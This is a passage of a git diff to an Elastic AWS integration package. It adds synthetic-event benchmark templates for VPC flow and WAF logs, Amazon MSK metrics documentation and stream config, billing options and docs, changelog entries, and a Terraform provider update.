@@ +{{- $timestamp := generate "timestamp" }} +{{- $cloud_region := generate "cloud_region" }} +{{- $cloud_availability_zone := awsAZFromRegion (print $cloud_region) }} +{{- $network_direction := generate "network_direction" }} +{{- $duration_start := generate "duration_start" }} +{{- $duration_end := generate "duration_end" }} +{{- $aws_vpcflow_start := $timestamp | date_modify (print $duration_start) }} +{{- $aws_vpcflow_end := $timestamp | date_modify (print $duration_end) }} +{{- $aws_vpcflow_version := generate "aws_vpcflow_version" }} +{{- $aws_vpcflow_account_id := generate "aws_vpcflow_account_id" }} +{{- $aws_vpcflow_interface_id := generate "aws_vpcflow_interface_id" }} +{{- $aws_vpcflow_action := generate "aws_vpcflow_action" }} +{{- $log_status := generate "log_status" }} +{{- $aws_vpcflow_pkt_srcaddr := generate "aws_vpcflow_pkt_srcaddr" }} +{{- $aws_vpcflow_pkt_dstaddr := generate "aws_vpcflow_pkt_dstaddr" }} +{{- $aws_vpcflow_vpc_id := generate "aws_vpcflow_vpc_id" }} +{{- $aws_vpcflow_subnet_id := generate "aws_vpcflow_subnet_id" }} +{{- $aws_vpcflow_tcp_flags := generate "aws_vpcflow_tcp_flags" }} +{{- $aws_vpcflow_pkt_dst_service := generate "aws_vpcflow_pkt_dst_service" }} +{{- $aws_vpcflow_pkt_src_service := generate "aws_vpcflow_pkt_src_service" }} +{{- $aws_vpcflow_traffic_path := generate "aws_vpcflow_traffic_path" }} +{{- $aws_vpcflow_sublocation_type := generate "aws_vpcflow_sublocation_type" }} +{{- $aws_vpcflow_sublocation_id := generate "aws_vpcflow_sublocation_id" }} +{{- $aws_vpcflow_srcaddr := generate "aws_vpcflow_srcaddr" }} +{{- $aws_vpcflow_dstaddr := generate "aws_vpcflow_dstaddr" }} +{{- $aws_vpcflow_srcport := generate "aws_vpcflow_srcport" }} +{{- $aws_vpcflow_dstport := generate "aws_vpcflow_dstport" }} +{{- $aws_vpcflow_protocol := generate "aws_vpcflow_protocol" }} +{{- $aws_vpcflow_packets := generate "aws_vpcflow_packets" }} +{{- $aws_vpcflow_bytes := generate "aws_vpcflow_bytes" }} +{{- $long_num := generate "long_num" }} +{{- $file_name := generate "file_name" }} +{{- $bucket_num := generate "bucket_num" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z" }}", + "agent": { + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "aws-scale-123456", + "type": "filebeat", + "version": "8.8.0" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-aws-bucket-{{ $bucket_num }}", + "name": "elastic-package-aws-bucket-{{ $bucket_num }}" + }, + "object": { + "key": "{{ $file_name }}.log" + } + } + }, + "data_stream": { + "dataset": "aws.vpcflow", + "namespace": "ep", + "type": "logs" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "snapshot": false, + "version": "8.8.0" + }, + "event": { + "dataset": "aws.vpcflow", + {{- if eq $log_status "OK"}} + "original" : "{\"message\":\"{{ $aws_vpcflow_version }} {{ $aws_vpcflow_account_id }} eni-{{ $aws_vpcflow_interface_id }}{{ mul $long_num 2 }} {{ $aws_vpcflow_srcaddr }} {{ $aws_vpcflow_dstaddr }} {{ $aws_vpcflow_srcport }} {{ $aws_vpcflow_dstport }} {{ $aws_vpcflow_protocol }} {{ $aws_vpcflow_packets }} {{ $aws_vpcflow_bytes }} {{ $aws_vpcflow_start.Unix }} {{ $aws_vpcflow_end.Unix }} {{ $aws_vpcflow_action }} {{ $log_status }} vpc-{{ $aws_vpcflow_vpc_id }}{{ $long_num }} subnet-{{ $aws_vpcflow_subnet_id }}{{ $long_num }} i-{{ $long_num }}{{ $long_num }} {{ $aws_vpcflow_tcp_flags }} IPv4 {{ $aws_vpcflow_pkt_srcaddr }} {{ $aws_vpcflow_pkt_dstaddr }} {{ $cloud_region }} {{ $cloud_availability_zone }} {{ $aws_vpcflow_sublocation_type }} {{ $aws_vpcflow_sublocation_id }} {{ $aws_vpcflow_pkt_src_service }} {{ $aws_vpcflow_pkt_dst_service }} {{ $network_direction }} {{ $aws_vpcflow_traffic_path }}\"}" + {{- else}} + "original" : "{\"message\":\"{{ $aws_vpcflow_version }} {{ $aws_vpcflow_account_id }} eni-{{ $aws_vpcflow_interface_id }}{{ mul $long_num 2 }} - - - - - - - {{ $aws_vpcflow_start.Unix }} {{ $aws_vpcflow_end.Unix }} - {{ $log_status }}\"}" + {{- end}} + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-aws-bucket-{{ $bucket_num }}.s3.{{ $cloud_region }}.amazonaws.com/{{ $file_name }}.log" + }, + "offset": 338 + }, + "tags": [ + "preserve_original_event", + "forwarded", + "aws-vpcflow" + ] +} \ No newline at end of file diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark.yml b/packages/aws/_dev/benchmark/rally/waf-benchmark.yml new file mode 100644 index 00000000000..91a94825304 --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/waf-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark of 20000 aws.waf events ingested +data_stream: + name: waf +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./waf-benchmark/template.ndjson + config: + path: ./waf-benchmark/config.yml + fields: + path: ./waf-benchmark/fields.yml diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark/config.yml b/packages/aws/_dev/benchmark/rally/waf-benchmark/config.yml new file mode 100644 index 00000000000..d50cfb302bb --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/waf-benchmark/config.yml @@ -0,0 +1,47 @@ +fields: + - name: timestamp + period: -24h + - name: event_duration + range: + min: 1 + max: 10000000 + - name: cloud_region + enum: ["ap-east-1", "ap-northeast-1", "ap-northeast-2", "ap-northeast-3", "ap-south-1", "ap-southeast-1", "ap-southeast-2", "ca-central-1", "eu-central-1", "eu-north-1", "eu-west-1", "eu-west-2", "eu-west-3", "me-south-1", "sa-east-1", "us-east-1", "us-east-2", "us-west-1", "us-west-2"] + - name: rule_id + enum: ["STMTest_SQLi_XSS", "Default_Action"] + - name: rule_ruleset + enum: ["REGULAR", "GROUP", "RATE_BASED", "MANAGED_RULE_GROUP"] + - name: event_action + enum: ["ALLOW", "BLOCK"] + - name: aws_waf_source_name + value: ["CF", "APIGW", "ALB", "APPSYNC", "COGNITOIDP", "APPRUNNER", "VERIFIED_ACCESS"] + - name: condition_type + enum: ["SQL_INJECTION", "XSS", "REGEX"] + - name: matched_data + range: + min: 1 + max: 100 + - name: http_method + enum: ["GET", "POST", "PUT", "DELETE"] + - name: bucket_num + range: + min: 63461 + max: 63471 + - name: cloud_account_id + range: + min: 100000000000 + max: 300000000000 + - name: rangeofid + range: + min: 0 + max: 10000 + - name: args + enum: ["ver=5.0.3", "", "ver=1.1"] + - name: uri_extension + enum: [".css", ".png", ".min.css"] + - name: long_num + range: + min: 1000000000 + max: 2000000000 + - name: country_codes + enum: ["AU", "US", "IN", "GR", "FR", "NZ", "NP"] diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark/fields.yml b/packages/aws/_dev/benchmark/rally/waf-benchmark/fields.yml new file mode 100644 index 00000000000..5c33fe76ea1 --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/waf-benchmark/fields.yml @@ -0,0 +1,51 @@ +- name: timestamp + type: date +- name: cloud_region + type: keyword +- name: cloud_account_id + type: keyword +- name: client_ip + type: ip +- name: file_name + type: keyword +- name: rangeofid + type: integer +- name: rule_id + type: keyword +- name: rule_ruleset + type: keyword +- name: event_action + type: keyword +- name: aws_waf_rate_based_rule_list + type: nested +- name: aws_waf_rule_group_list + type: nested +- name: aws_waf_non_terminating_matching_rules + type: nested +- name: aws_waf_terminating_rule_match_details + type: nested +- name: aws_waf_source_name + type: keyword +- name: condition_type + type: keyword +- name: location + type: keyword +- name: matched_data + type: long +- name: http_method + type: keyword +- name: file_name + type: keyword + example: extra-samples +- name: bucket_num + type: long +- name: args + type: keyword +- name: uri_path + type: keyword +- name: uri_extension + type: keyword +- name: long_num + type: long +- name: country_codes + type: keyword diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark/template.ndjson b/packages/aws/_dev/benchmark/rally/waf-benchmark/template.ndjson new file mode 100644 index 00000000000..5fa2d3b43a2 --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/waf-benchmark/template.ndjson @@ -0,0 +1,76 @@ +{{- $timestamp := generate "timestamp" }} +{{- $cloud_region := generate "cloud_region" }} +{{- $cloud_account_id := generate "cloud_account_id" }} +{{- $file_name := generate "file_name" }} +{{- $rangeofid := generate "rangeofid" }} +{{- $rule_id := generate "rule_id" }} +{{- $rule_ruleset := generate "rule_ruleset" }} +{{- $event_action := generate "event_action" }} +{{- $aws_waf_rate_based_rule_list := generate "aws_waf_rate_based_rule_list" }} +{{- $aws_waf_rule_group_list := generate "aws_waf_rule_group_list" }} +{{- $aws_waf_non_terminating_matching_rules := generate "aws_waf_non_terminating_matching_rules" }} +{{- $aws_waf_terminating_rule_match_details := generate "aws_waf_terminating_rule_match_details" }} +{{- $aws_waf_source_name := generate "aws_waf_source_name" }} +{{- $client_ip := generate "client_ip" }} +{{- $condition_type := generate "condition_type" }} +{{- $location := generate "location" }} +{{- $matched_data := generate "matched_data" }} +{{- $http_method := generate "http_method" }} +{{- $bucket_num := generate "bucket_num" }} +{{- $args := generate "args" }} +{{- $uri_path := generate "uri_path" }} +{{- $uri_extension := generate "uri_extension" }} +{{- $long_num := generate "long_num" }} +{{- $country_codes := generate "country_codes" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z" }}", + "agent": { + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "aws-scale-123456", + "type": "filebeat", + "version": "8.8.0" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-aws-bucket-{{ $bucket_num }}", + "name": "elastic-package-aws-bucket-{{ $bucket_num }}" + }, + "object": { + "key": "{{ $file_name }}.log" + } + } + }, + "data_stream": { + "dataset": "aws.waf", + "namespace": "ep", + "type": "logs" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "snapshot": false, + "version": "8.8.0" + }, + {{- if eq $rule_id "Default_Action" }} + "message": "{\"timestamp\":{{ $timestamp.UnixMilli }},\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:{{ $cloud_region }}:{{ $cloud_account_id }}:9b3b8307-f0d8-4425-bd32-499444d92ea1\",\"terminatingRuleId\":\"{{ $rule_id }}\",\"terminatingRuleType\":\"{{ $rule_ruleset }}\",\"action\":\"{{ $event_action }}\",\"httpSourceName\":\"{{ $aws_waf_source_name }}\",\"httpSourceId\":\"{{ $long_num }}-app/wordpress/d3fad233572a26a0\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"{{ $client_ip}}\",\"country\":\"{{ $country_codes }}\",\"headers\":[{\"name\":\"Host\",\"value\":\"wordpress-{{ $long_num }}.{{ $cloud_region }}.elb.amazonaws.com\"},{\"name\":\"User-Agent\",\"value\":\"Apache-HttpClient/4.5.6 (Java/1.8.0_191)\"}],\"uri\":\"/wp-content/{{ $uri_path }}{{ $uri_extension }}\",\"args\":\"{{ $args }}\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"{{ $http_method }}\",\"requestId\":\"rid-{{ $rangeofid }}\"}}", + {{- else}} + "message": "{\"timestamp\":{{ $timestamp.UnixMilli }},\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:{{ $cloud_region }}:{{ $cloud_account_id }}:9b3b8307-f0d8-4425-bd32-499444d92ea1\",\"terminatingRuleId\":\"{{ $rule_id }}\",\"terminatingRuleType\":\"{{ $rule_ruleset }}\",\"action\":\"{{ $event_action }}\",\"terminatingRuleMatchDetails\": [{\"conditionType\": \"{{ $condition_type }}\",\"location\": \"{{ generate "location" }}\",\"matchedData\": [\"{{ $matched_data }}\",\"AND\",\"{{ $matched_data }}\"]}],\"httpSourceName\":\"{{ $aws_waf_source_name }}\",\"httpSourceId\":\"{{ $long_num }}-app/wordpress/d3fad233572a26a0\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"{{ $client_ip}}\",\"country\":\"{{ $country_codes }}\",\"headers\":[{\"name\":\"Host\",\"value\":\"wordpress-{{ $long_num }}.{{ $cloud_region }}.elb.amazonaws.com\"},{\"name\":\"User-Agent\",\"value\":\"Apache-HttpClient/4.5.6 (Java/1.8.0_191)\"}],\"uri\":\"/wp-content/{{ $uri_path }}{{ $uri_extension }}\",\"args\":\"{{ $args }}\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"{{ $http_method }}\",\"requestId\":\"rid-{{ $rangeofid }}\"}}", + {{- end}} + "event": { + "dataset": "aws.waf" + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-aws-bucket-{{ $bucket_num }}.s3.us-east-1.amazonaws.com/waf.log" + }, + "offset": 0 + }, + "tags": [ + "forwarded", + "aws-waf" + ] +} \ No newline at end of file diff --git a/packages/aws/_dev/build/docs/billing.md b/packages/aws/_dev/build/docs/billing.md index 867dd256369..b5cf249b2c8 100644 --- a/packages/aws/_dev/build/docs/billing.md +++ b/packages/aws/_dev/build/docs/billing.md @@ -8,6 +8,11 @@ For example, you could use this data to easily view your total estimated charges **IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS integration for more details.** +## Limitations + +When you want to group by a combination of several tags and dimensions, like `SERVICE` along with various tags (e.g., `team`, `project`, `aws:createdBy`), you might see duplicated data. This happens because of a [limitation](https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_GetCostAndUsage.html) with the `GetCostAndUsage` API, which only allows grouping costs by two different groups. + +To avoid data duplication, it's recommended to aggregate data using a combination of two attributes, which can be either: one tag and one dimension, two tags or two dimensions. ## Data streams diff --git a/packages/aws/_dev/build/docs/kafka.md b/packages/aws/_dev/build/docs/kafka.md new file mode 100644 index 00000000000..1a2cbac481b --- /dev/null +++ b/packages/aws/_dev/build/docs/kafka.md @@ -0,0 +1,48 @@ +# Amazon Managed Streaming for Apache Kafka (MSK) + +The Amazon Kafka integration allows you to monitor [Amazon MSK](https://aws.amazon.com/msk/) — it's a fully managed +service that makes it easy for you to build and run applications that use Apache Kafka to process streaming data + +Use the Amazon Kafka integration to collect metrics related to your MSK clusters from CloudWatch. This integration only +supports collecting DEFAULT level monitoring metrics for now. Once these metrics are sent to Elastic, you can visualize +them in Kibana, create alerts to notify you if something goes wrong, and reference the metrics when troubleshooting +an issue. + +**IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS +integration for more details.** + +## Data streams + +The Amazon Kafka integration collects one type of data: metrics. + +**Metrics** give you insight into the state of Amazon MSK. +The metrics collected by the Amazon Kafka integration include bytes received from clients, bytes sent to clients, number +of incoming messages and more. See more details in the [Metrics reference](#metrics-reference) + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +Before using any AWS integration you will need: + +* **AWS Credentials** to connect with your AWS account. +* **AWS Permissions** to make sure the user you're using to connect has permission to share the relevant data. + +For more details about these requirements, see the **AWS** integration documentation. + +## Setup + +Use this integration if you only need to collect data from the Amazon MSK service. + +If you want to collect data from two or more AWS services, consider using the **AWS** integration. +When you configure the AWS integration, you can collect data from as many AWS services as you'd like. + +For step-by-step instructions on how to set up an integration, see the +{{ url "getting-started-observability" "Getting started" }} guide. + +## Metrics reference + +{{event "kafka_metrics"}} + +{{fields "kafka_metrics"}} diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index 2587c41c6ef..96e86031f05 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,39 @@ # newer versions go on top +- version: "2.14.1" + changes: + - description: Document billing data stream limitations. + type: enhancement + link: https://github.com/elastic/integrations/pull/9290 +- version: "2.14.0" + changes: + - description: Add ability to set processors and leader election on AWS Billing. + type: enhancement + link: https://github.com/elastic/integrations/pull/8414 +- version: "2.13.1" + changes: + - description: Update latency parameter description + type: enhancement + link: https://github.com/elastic/integrations/pull/9346 +- version: "2.13.0" + changes: + - description: Add Amazon MSK integration + type: enhancement + link: https://github.com/elastic/integrations/pull/9133 +- version: "2.12.2" + changes: + - description: Fix an issue were the "_id" field was being used to aggregate data in Severity Over Time dashboard. + type: bugfix + link: https://github.com/elastic/integrations/pull/9253 +- version: "2.12.1" + changes: + - description: Add cloudsecurity_cdr sub category label. + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "2.12.0" + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "2.11.3" changes: - description: Fix query range calculation for GuardDuty datastream. @@ -1172,7 +1207,7 @@ - description: Convert to generated ECS fields type: enhancement link: https://github.com/elastic/integrations/pull/1465 -- version: '0.10.2' +- version: "0.10.2" changes: - description: update to ECS 1.11.0 type: enhancement diff --git a/packages/aws/data_stream/apigateway_metrics/manifest.yml b/packages/aws/data_stream/apigateway_metrics/manifest.yml index 9fad056decc..a3ded65eaa3 100644 --- a/packages/aws/data_stream/apigateway_metrics/manifest.yml +++ b/packages/aws/data_stream/apigateway_metrics/manifest.yml @@ -25,7 +25,7 @@ streams: required: false show_user: true - name: latency - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `5m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. type: text title: Latency multi: false diff --git a/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs b/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs index ff0998752c9..fbbfd6733a7 100644 --- a/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs +++ b/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs @@ -44,4 +44,11 @@ cost_explorer_config.group_by_tag_keys: {{/if}} {{#if proxy_url }} proxy_url: {{proxy_url}} -{{/if}} \ No newline at end of file +{{/if}} +{{#if leaderelection}} +condition: ${kubernetes_leaderelection.leader} == true +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/aws/data_stream/billing/manifest.yml b/packages/aws/data_stream/billing/manifest.yml index f63ab40987c..3fda2894036 100644 --- a/packages/aws/data_stream/billing/manifest.yml +++ b/packages/aws/data_stream/billing/manifest.yml @@ -49,5 +49,22 @@ streams: show_user: false default: true description: When include_linked_accounts is set to true, CloudWatch metrics will be collected from both linked accounts and the monitoring account. Default is true. + - name: leaderelection + type: bool + title: Leader Election + multi: false + required: true + show_user: false + default: false + description: > + Enable leaderelection between a set of Elastic Agents running on Kubernetes. + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the events are shipped. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. title: AWS Billing Metrics description: Collect billing metrics from Amazon Web Services with Elastic Agent. diff --git a/packages/aws/data_stream/cloudtrail/manifest.yml b/packages/aws/data_stream/cloudtrail/manifest.yml index 132031cfece..ca548f11d96 100644 --- a/packages/aws/data_stream/cloudtrail/manifest.yml +++ b/packages/aws/data_stream/cloudtrail/manifest.yml @@ -160,11 +160,13 @@ streams: - name: password type: password title: Splunk REST API Password + secret: true required: false show_user: true - name: token type: password title: Splunk Authorization Token + secret: true description: | Bearer Token or Session Key, e.g. "Bearer eyJFd3e46..." or "Splunk 192fd3e...". Cannot be used with username diff --git a/packages/aws/data_stream/ebs/manifest.yml b/packages/aws/data_stream/ebs/manifest.yml index ddc6369b0f6..d738b843814 100644 --- a/packages/aws/data_stream/ebs/manifest.yml +++ b/packages/aws/data_stream/ebs/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl b/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl index d8769bd6de8..d1947fa596b 100644 --- a/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl +++ b/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl @@ -2,19 +2,23 @@ # Manual edits may be lost in future updates. provider "registry.terraform.io/hashicorp/aws" { - version = "4.0.0" + version = "5.39.1" hashes = [ - "h1:G0toIzBkhRr/UNRdksvnIyPXnGT9nH0A7gWmu93I1Eg=", - "zh:02937cb37860b022e7d996726e7584ca23904baf7852d266f2dd7891ee088ae4", - "zh:259dd5790ec5f4e6814c9584c79834dce3d719e932ce662b21f13434e9441194", - "zh:2d230c8c92c3cb2c07471a4324d802c44365dcf99fe0d562cc737d1f964e9c1d", - "zh:380b04e78934519469e699c537516ae1674d15f77c6778c2738cd69374b661aa", - "zh:3d7121da1fa92166c9ea26f3c9839cef06833420d6c46978b4cbbfd0b5050791", - "zh:6b7f5a3b28ec3a631d689f599a39bfe98ca5b785353b01e374cff655b097a791", - "zh:7882291716d2d03df5ece721429770452db76c712fcff08964c3a7c0b639f703", - "zh:95250c5768610d69a28501f03176b6a05a5d5ac2ae317cb582d94b044b3272b3", - "zh:b16a622a76bee455c8b256d828f8a60515e1e9dad38420a4db1be9b9e16d474a", - "zh:c805822f0ba57e8063b6201e1f351aa4dbd5ad8886dedd25d809e5aeb9aa0259", - "zh:e1c3a0da5576aec4a48f897cd04b739c1f533cdb0005ce4c7f5bc45808b799b1", + "h1:hQLlAd6O1LdQHy1GdWtgT5fcOlc3TWW+SaaFkpe+e8E=", + "zh:05c50a5d8edb3ba4ebc4eb6e0d0b5e319142f5983b27821710ed7d475d335bdc", + "zh:082986a5784dd21957e632371b289e549f051a4ea21d5c78c6d744c3537f03c5", + "zh:192ae622ba562eacc4921ed549a794506179233d724fdd15a4f147f3400724a0", + "zh:19a1d4637a62de90b0da174c0bf01000cd900488f7e8f709d8a37f082c59756b", + "zh:1d7689a8583515f1705972d7ce57ccfab96215b19905530d2c78c02dcfaff583", + "zh:22c446a21209a52ab74b4ba1ede0b220531e97ce479430047e493a2c45e1d8cb", + "zh:4154de82290ab4e9f81bac1ea62342de8b3b7a608f99258c190d4dd1c6663e47", + "zh:6bc4859ccdc54f28af9286b2fa090a31dcb345138d68c471510b737f6a052011", + "zh:73c69e000e0b321e78a4a12fef60d37285f2afec0ea7be9e06163d985101cb59", + "zh:890a3422f5e445b49bae30facf448d0ec9cd647e9155d0b685b5b39e9d331a94", + "zh:9b12af85486a96aedd8d7984b0ff811a4b42e3d88dad1a3fb4c0b580d04fa425", + "zh:9cd88bec0f5205df9032e3126d4e57edd1c5cc8d45cda25626882dafc485a3b0", + "zh:a3a8e3276d0fbf051bbafa192a2998b05745f2cf285ac8c36a9ad167a75c037f", + "zh:d47e4dcf4c0ad71b9a7c720be4f3a89f6786a82e77bbe8d950794562792a1da5", + "zh:f74e5b2af508c7de80a6ae5198df54a795eeba5058a0cd247828943f0c54f6e0", ] } diff --git a/packages/aws/data_stream/ec2_metrics/manifest.yml b/packages/aws/data_stream/ec2_metrics/manifest.yml index 59ceddadaf0..8a15fd55b2d 100644 --- a/packages/aws/data_stream/ec2_metrics/manifest.yml +++ b/packages/aws/data_stream/ec2_metrics/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/ecs_metrics/manifest.yml b/packages/aws/data_stream/ecs_metrics/manifest.yml index 73306c0da3e..837fa3d6fb4 100644 --- a/packages/aws/data_stream/ecs_metrics/manifest.yml +++ b/packages/aws/data_stream/ecs_metrics/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/elb_metrics/manifest.yml b/packages/aws/data_stream/elb_metrics/manifest.yml index 5b1c38bb754..48bce706a5d 100644 --- a/packages/aws/data_stream/elb_metrics/manifest.yml +++ b/packages/aws/data_stream/elb_metrics/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: tags_filter type: yaml title: Tags Filter diff --git a/packages/aws/data_stream/emr_metrics/manifest.yml b/packages/aws/data_stream/emr_metrics/manifest.yml index c16c0819354..373787bc6a6 100644 --- a/packages/aws/data_stream/emr_metrics/manifest.yml +++ b/packages/aws/data_stream/emr_metrics/manifest.yml @@ -31,7 +31,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/firewall_metrics/manifest.yml b/packages/aws/data_stream/firewall_metrics/manifest.yml index 417522f087a..672815ad860 100644 --- a/packages/aws/data_stream/firewall_metrics/manifest.yml +++ b/packages/aws/data_stream/firewall_metrics/manifest.yml @@ -30,7 +30,7 @@ streams: multi: false required: false show_user: false - description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`. + description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`. - name: include_linked_accounts type: bool title: Include Linked Accounts diff --git a/packages/aws/data_stream/kafka_metrics/agent/stream/stream.yml.hbs b/packages/aws/data_stream/kafka_metrics/agent/stream/stream.yml.hbs new file mode 100644 index 00000000000..395ce09518d --- /dev/null +++ b/packages/aws/data_stream/kafka_metrics/agent/stream/stream.yml.hbs @@ -0,0 +1,99 @@ +metricsets: ["cloudwatch"] +period: {{period}} +{{#if data_granularity}} +data_granularity: {{data_granularity}} +{{/if}} +{{#if include_linked_accounts}} +include_linked_accounts: {{include_linked_accounts}} +{{/if}} +{{#if access_key_id}} +access_key_id: {{access_key_id}} +{{/if}} +{{#if secret_access_key}} +secret_access_key: {{secret_access_key}} +{{/if}} +{{#if session_token}} +session_token: {{session_token}} +{{/if}} +{{#if credential_profile_name}} +credential_profile_name: {{credential_profile_name}} +{{/if}} +{{#if shared_credential_file}} +shared_credential_file: {{shared_credential_file}} +{{/if}} +{{#if role_arn}} +role_arn: {{role_arn}} +{{/if}} +{{#if default_region}} +default_region: {{default_region}} +{{/if}} +{{#if regions}} +regions: +{{#each regions as |region i|}} +- {{region}} +{{/each}} +{{/if}} +{{#if latency}} +latency: {{latency}} +{{/if}} +{{#if tags_filter}} +tags_filter: {{tags_filter}} +{{/if}} +{{#if proxy_url }} +proxy_url: {{proxy_url}} +{{/if}} +metrics: +- namespace: AWS/Kafka + resource_type: kafka + statistic: ["Sum"] + name: + - ActiveControllerCount + - BytesInPerSec + - BytesOutPerSec + - ClientConnectionCount + - ConnectionCount + - EstimatedMaxTimeLag + - FetchMessageConversionsPerSec + - GlobalPartitionCount + - GlobalTopicCount + - LeaderCount + - MessagesInPerSec + - NetworkRxDropped + - NetworkRxErrors + - NetworkRxPackets + - NetworkTxDropped + - NetworkTxErrors + - NetworkTxPackets + - MaxOffsetLag + - ProduceMessageConversionsPerSec + - SumOffsetLag +- namespace: AWS/Kafka + resource_type: kafka + statistic: ["Average"] + name: + - BurstBalance + - CPUCreditBalance + - CpuIdle + - CpuIoWait + - CpuSystem + - CpuUser + - KafkaAppLogsDiskUsed + - KafkaDataLogsDiskUsed + - LeaderCount + - MemoryBuffered + - MemoryCached + - MemoryFree + - HeapMemoryAfterGC + - MemoryUsed + - OfflinePartitionsCount + - PartitionCount + - ProduceTotalTimeMsMean + - RequestBytesMean + 